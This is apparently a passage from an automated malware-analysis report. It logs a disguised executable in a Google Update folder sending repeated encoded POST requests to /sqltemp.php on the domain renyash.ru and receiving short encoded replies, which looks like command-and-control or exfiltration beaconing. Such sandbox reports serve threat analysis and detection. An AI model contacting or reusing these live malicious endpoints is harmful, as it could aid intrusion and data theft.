                                                                                                                  64192.168.2.662700104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:01.692192078 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:02.056293964 CET1124OUTData Raw: 56 57 5a 57 51 5d 51 57 58 56 52 59 56 5e 59 51 5b 59 54 5b 55 59 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VWZWQ]QWXVRYV^YQ[YT[UYPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$<!X",%Y'</:!=+:#*>$X#"3+%B17T9&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:02.169117928 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  65192.168.2.662701104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:02.194813967 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:02.547841072 CET1964OUTData Raw: 56 53 5f 5c 54 5a 54 51 58 56 52 59 56 5c 59 5e 5b 58 54 51 55 5d 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VS_\TZTQXVRYV\Y^[XTQU]PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0)7/9X37,\2 ?+#V).<4"4(D1'9*&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:02.667963982 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:02.942850113 CET956INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:02 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YIcm62mtuUESCCkEKoCdweMgQWgRH4y8c95ekaBnVA6%2FcrIcf2OJ2A1Aj5S1cqrnkL0U2tgPEtC7pymeCgsRyJ2i26Cu9SCFEAXBRpHaqn%2B2gzRT5ea%2BwM%2Bn9uq3eXYJ4ue9ay7B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364d15f41c343-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7985&min_rtt=1681&rtt_var=13239&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=28014&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 1d 29 3e 31 0c 24 32 20 5d 3c 13 0d 56 25 07 3d 02 28 01 3a 5d 33 07 30 02 2a 00 2b 10 36 3f 21 5a 31 06 24 58 21 3e 2f 5f 33 0e 2b 59 05 1c 20 44 36 2c 37 03 3d 03 09 5d 31 11 35 5c 33 2e 24 15 3c 01 23 0c 23 2b 2f 58 33 3d 3b 01 2a 5c 34 1d 24 3f 3f 5f 2d 2f 32 0e 33 2a 2c 54 00 11 26 1c 27 1f 30 16 20 37 02 12 21 1f 14 03 32 1a 3e 15 25 2c 3b 1b 37 00 2d 00 26 22 09 59 21 1d 03 06 32 28 25 13 34 3d 3f 54 3e 14 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%)>1$2 ]<V%=(:]30*+6?!Z1$X!>/_3+Y D6,7=]15\3.$<##+/X3=;*\4$??_-/23*,T&'0 7!2>%,;7-&"Y!2(%4=?T>%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  66192.168.2.662702104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:02.315737009 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:02.672863960 CET1124OUTData Raw: 56 5f 5f 5c 54 5c 54 55 58 56 52 59 56 5f 59 54 5b 59 54 59 55 54 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: V__\T\TUXVRYV_YT[YTYUTP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-&<&7:'- ;): X**$>/##+(9&<.*&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:03:02.780877113 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:02.985894918 CET798INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:02 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LbXGP3K9Ia0kJ2qY6S6b9XhxKoV5Aj0WKUy8fhZWkUJxf8YAo3kwAqpN0lHXCWA4n1gV4YLWH0KAzePX0A3km6CgeyzLZrH3d0GmcIKHOW2cfiPhXKfY5yZO48U404s8d1QkYwXk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364d2180d4291-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3435&min_rtt=1639&rtt_var=4207&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=91187&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  67192.168.2.662703104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:03.113523006 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:03.470048904 CET1124OUTData Raw: 53 55 5f 54 54 59 54 5c 58 56 52 59 56 5d 59 56 5b 52 54 59 55 5d 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SU_TTYT\XVRYV]YV[RTYU]P]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0?-#&$X?E/:-U!=8X+9*=7#!<(+:%W,:&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:03:03.617702961 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:03.869923115 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:03 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WqtAk%2FFAf6H0KG2dk%2FJH0XEb0%2FNAXtniSIKXdTvlqlZT9zqMCyzDQblMCSYaIdL7JZRbW5mY3tGm7OELqpcfk%2Fj7q6ucf1AyEgqSXlMa1BvrNCwscY5IO09Xc04%2BKdD5oGMCUi%2BF"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364d749180f81-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4703&min_rtt=3499&rtt_var=2172&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=417262&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a
                                                                                                                  Data Ascii: 42W\X
                                                                                                                  Jan 1, 2025 16:03:03.958408117 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  68192.168.2.662704104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:04.082139969 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:04.536664963 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:04.716706991 CET1124OUTData Raw: 53 53 5a 56 54 50 54 55 58 56 52 59 56 5e 59 55 5b 5b 54 5f 55 5e 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SSZVTPTUXVRYV^YU[[T_U^PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3<!\ *0=;;)=U4=$(+).[#17(+"&Y'R.*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:05.068434954 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:05 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9CIjXfAmJkNfh73YgDHoUxetAB0YXn9VDs0wcF06SMdZ0PPC2gT1lNThd5NBf3e%2BOIDDC%2BVyi5Qs1NYTUanYlk6X9%2Fkf61X%2FgsecXLvVQD7gAbMcf4srQXDGJQvgnB%2ByLA1Czb0L"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364dd0cef8ca1-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5095&min_rtt=2417&rtt_var=6263&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=61233&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  69192.168.2.662705104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:05.191215992 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:05.547817945 CET1124OUTData Raw: 53 53 5f 50 54 5d 54 5c 58 56 52 59 56 51 59 57 5b 59 54 59 55 58 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SS_PT]T\XVRYVQYW[YTYUXP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.['!7-3'/)T40Z<>#/X<5D2:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:05.655436039 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:05.910667896 CET800INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:05 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M6AVg45NfB67Y57TpSPWHwrtzdTEwqt2QeviEWlipY06GPJ53XjBcoIZbBUkMMmfeJd8xYZ9T3DOlERvTKUwbIIIV0ji9YZGTLtHhtZXC6%2FfmPugctA5QQAZS8FDRt27XJRkAtFw"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364e409044201-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3732&min_rtt=1963&rtt_var=4274&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=90593&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  70192.168.2.662706104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:06.043085098 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:06.391849995 CET1124OUTData Raw: 53 57 5f 5d 51 5d 51 55 58 56 52 59 56 5b 59 51 5b 5a 54 5d 55 5f 50 54 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_]Q]QUXVRYV[YQ[ZT]U_PTZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$: 20>?A/. [ ?*#V*>7Z<!1?,:&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:06.487298012 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:06.667912006 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:06 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gq0oWyWJEIXKh%2F4%2BRTpq1DSrPV9Nb6NnS4DRn5aVoMybY9vnPixoabDt1OrTGwfaf1tblIbPoASfgpCPWHQ60DYb6J44yuTA3d%2Bsfug97rs%2BM0RFnJATYyEjYmkkOISK64fxSdua"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364e948f94233-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5517&min_rtt=2486&rtt_var=6995&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=54599&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  71192.168.2.662707104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:06.801279068 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:07.245246887 CET1124OUTData Raw: 53 53 5f 54 51 58 51 56 58 56 52 59 56 50 59 53 5b 53 54 5c 55 55 50 5c 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SS_TQXQVXVRYVPYS[ST\UUP\Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$/-4?1'=+,:27=[+)7R*.[ 2*+*&Y$.:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:07.272711039 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:07.513871908 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:07 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hvou8QjLgg3HbykTRWnT6sObBOh3pzDsiLYF6OAoyCe1Pjf%2FW4abf8Gv%2BP7crtP8zz%2FyNtCRUqMGrrCmLDIubn5SsyEcbnHfGPBIdBmsbJOf24NQyVYn%2BXfmmUM7xItw1xhZ8WQ2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364ee299e199d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4869&min_rtt=1890&rtt_var=6667&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=56756&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  72192.168.2.662708104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:07.647829056 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  73192.168.2.662709104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:07.960408926 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:08.313519955 CET1964OUTData Raw: 53 55 5a 57 51 5c 51 57 58 56 52 59 56 5f 59 50 5b 5c 54 5b 55 58 50 54 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SUZWQ\QWXVRYV_YP[\T[UXPTZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.'Y% 2'-',-4=$Y?)). T7[<]"%(.:&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:03:08.427053928 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:08.608072042 CET955INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:08 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BnIuqMcauHvEy42Br26MG1LOYwFYxMMGpeltxwmqchtS%2FDldommSZuxUfZEd0w1Qp3Z8c%2BtPUmbATldhvnycDCD3bsraoMEqGDdS0FfUS%2FPsIPcN%2B05KifuJcDk7Pjlqi7gozRuQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364f55f6841ac-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4974&min_rtt=1773&rtt_var=7068&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=53309&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
